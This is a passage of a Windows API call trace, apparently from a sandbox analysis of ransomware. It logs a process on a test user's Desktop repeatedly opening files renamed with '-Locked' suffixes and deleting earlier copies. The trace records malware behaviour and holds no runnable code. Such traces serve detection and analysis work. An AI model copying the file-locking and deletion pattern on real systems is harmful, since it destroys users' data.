lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0311.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.047] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.048] GetFileType (hFile=0x480) returned 0x1 [0311.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.048] GetFileType (hFile=0x480) returned 0x1 [0311.050] CloseHandle (hObject=0x480) returned 1 [0311.050] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x37 [0311.050] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini-locked-locked")) returned 1 [0311.051] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked", lpFilePart=0x0) returned 0x43 [0311.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.051] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\g2jifnab-ihgfnotudc.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.052] GetFileType (hFile=0x480) returned 0x1 [0311.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.052] GetFileType (hFile=0x480) returned 0x1 [0311.053] CloseHandle (hObject=0x480) returned 1 [0311.054] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked", lpFilePart=0x0) returned 0x3c [0311.054] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\g2jifnab-ihgfnotudc.wav-locked")) returned 1 [0311.055] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4a [0311.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.055] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\g2jifnab-ihgfnotudc.wav-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.055] GetFileType (hFile=0x480) returned 0x1 [0311.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.055] GetFileType (hFile=0x480) returned 0x1 [0311.057] CloseHandle (hObject=0x480) returned 1 [0311.058] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked", lpFilePart=0x0) returned 0x43 [0311.058] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\g2jifnab-ihgfnotudc.wav-locked-locked")) returned 1 [0311.058] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked", lpFilePart=0x0) returned 0x3a [0311.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.059] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\h axusmo6g.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.059] GetFileType (hFile=0x480) returned 0x1 [0311.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.059] GetFileType (hFile=0x480) returned 0x1 [0311.061] CloseHandle (hObject=0x480) returned 1 [0311.061] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked", lpFilePart=0x0) returned 0x33 [0311.061] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\h axusmo6g.png-locked")) returned 1 [0311.062] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked-Locked", lpFilePart=0x0) returned 0x41 [0311.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.062] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\h axusmo6g.png-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.063] GetFileType (hFile=0x480) returned 0x1 [0311.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.063] GetFileType (hFile=0x480) returned 0x1 [0311.065] CloseHandle (hObject=0x480) returned 1 [0311.065] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked", lpFilePart=0x0) returned 0x3a [0311.065] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\h axusmo6g.png-locked-locked")) returned 1 [0311.066] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked", lpFilePart=0x0) returned 0x36 [0311.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.066] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\heljnz.bmp-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.066] GetFileType (hFile=0x480) returned 0x1 [0311.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.067] GetFileType (hFile=0x480) returned 0x1 [0311.068] CloseHandle (hObject=0x480) returned 1 [0311.069] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked", lpFilePart=0x0) returned 0x2f [0311.069] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\heljnz.bmp-locked")) returned 1 [0311.070] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3d [0311.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.070] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\heljnz.bmp-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.071] GetFileType (hFile=0x480) returned 0x1 [0311.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.071] GetFileType (hFile=0x480) returned 0x1 [0311.072] CloseHandle (hObject=0x480) returned 1 [0311.073] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked", lpFilePart=0x0) returned 0x36 [0311.073] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\heljnz.bmp-locked-locked")) returned 1 [0311.074] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked", lpFilePart=0x0) returned 0x40 [0311.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.074] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\hhodzgzf8 9dlbfx.avi-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.074] GetFileType (hFile=0x480) returned 0x1 [0311.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.074] GetFileType (hFile=0x480) returned 0x1 [0311.076] CloseHandle (hObject=0x480) returned 1 [0311.076] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked", lpFilePart=0x0) returned 0x39 [0311.076] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\hhodzgzf8 9dlbfx.avi-locked")) returned 1 [0311.077] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked-Locked", lpFilePart=0x0) returned 0x47 [0311.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.077] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\hhodzgzf8 9dlbfx.avi-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.120] GetFileType (hFile=0x480) returned 0x1 [0311.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.120] GetFileType (hFile=0x480) returned 0x1 [0311.122] CloseHandle (hObject=0x480) returned 1 [0311.122] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked", lpFilePart=0x0) returned 0x40 [0311.122] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\hhodzgzf8 9dlbfx.avi-locked-locked")) returned 1 [0311.123] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", lpFilePart=0x0) returned 0x43 [0311.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.123] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\iwyhbofmjlgpq_b7ud9.avi-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.123] GetFileType (hFile=0x480) returned 0x1 [0311.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.123] GetFileType (hFile=0x480) returned 0x1 [0311.125] CloseHandle (hObject=0x480) returned 1 [0311.125] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked", lpFilePart=0x0) returned 0x3c [0311.125] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\iwyhbofmjlgpq_b7ud9.avi-locked")) returned 1 [0311.126] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4a [0311.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.126] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\iwyhbofmjlgpq_b7ud9.avi-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.127] GetFileType (hFile=0x480) returned 0x1 [0311.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.127] GetFileType (hFile=0x480) returned 0x1 [0311.128] CloseHandle (hObject=0x480) returned 1 [0311.128] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", lpFilePart=0x0) returned 0x43 [0311.128] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\iwyhbofmjlgpq_b7ud9.avi-locked-locked")) returned 1 [0311.129] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked", lpFilePart=0x0) returned 0x37 [0311.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.129] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\izrqfjn.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.129] GetFileType (hFile=0x480) returned 0x1 [0311.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.129] GetFileType (hFile=0x480) returned 0x1 [0311.131] CloseHandle (hObject=0x480) returned 1 [0311.131] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked", lpFilePart=0x0) returned 0x30 [0311.131] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\izrqfjn.m4a-locked")) returned 1 [0311.132] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0311.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.132] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\izrqfjn.m4a-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.132] GetFileType (hFile=0x480) returned 0x1 [0311.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.132] GetFileType (hFile=0x480) returned 0x1 [0311.134] CloseHandle (hObject=0x480) returned 1 [0311.134] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked", lpFilePart=0x0) returned 0x37 [0311.134] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\izrqfjn.m4a-locked-locked")) returned 1 [0311.135] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked", lpFilePart=0x0) returned 0x35 [0311.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.135] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l0cw.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.135] GetFileType (hFile=0x480) returned 0x1 [0311.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.135] GetFileType (hFile=0x480) returned 0x1 [0311.137] CloseHandle (hObject=0x480) returned 1 [0311.137] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked", lpFilePart=0x0) returned 0x2e [0311.137] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l0cw.docx-locked")) returned 1 [0311.138] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3c [0311.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.138] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l0cw.docx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.138] GetFileType (hFile=0x480) returned 0x1 [0311.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.138] GetFileType (hFile=0x480) returned 0x1 [0311.139] CloseHandle (hObject=0x480) returned 1 [0311.140] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked", lpFilePart=0x0) returned 0x35 [0311.140] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l0cw.docx-locked-locked")) returned 1 [0311.140] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked", lpFilePart=0x0) returned 0x3f [0311.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.140] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l3cxan4c0b0rw2-.mkv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.140] GetFileType (hFile=0x480) returned 0x1 [0311.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.141] GetFileType (hFile=0x480) returned 0x1 [0311.142] CloseHandle (hObject=0x480) returned 1 [0311.142] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked", lpFilePart=0x0) returned 0x38 [0311.145] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l3cxan4c0b0rw2-.mkv-locked")) returned 1 [0311.145] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked-Locked", lpFilePart=0x0) returned 0x46 [0311.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.146] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l3cxan4c0b0rw2-.mkv-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.146] GetFileType (hFile=0x480) returned 0x1 [0311.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.146] GetFileType (hFile=0x480) returned 0x1 [0311.147] 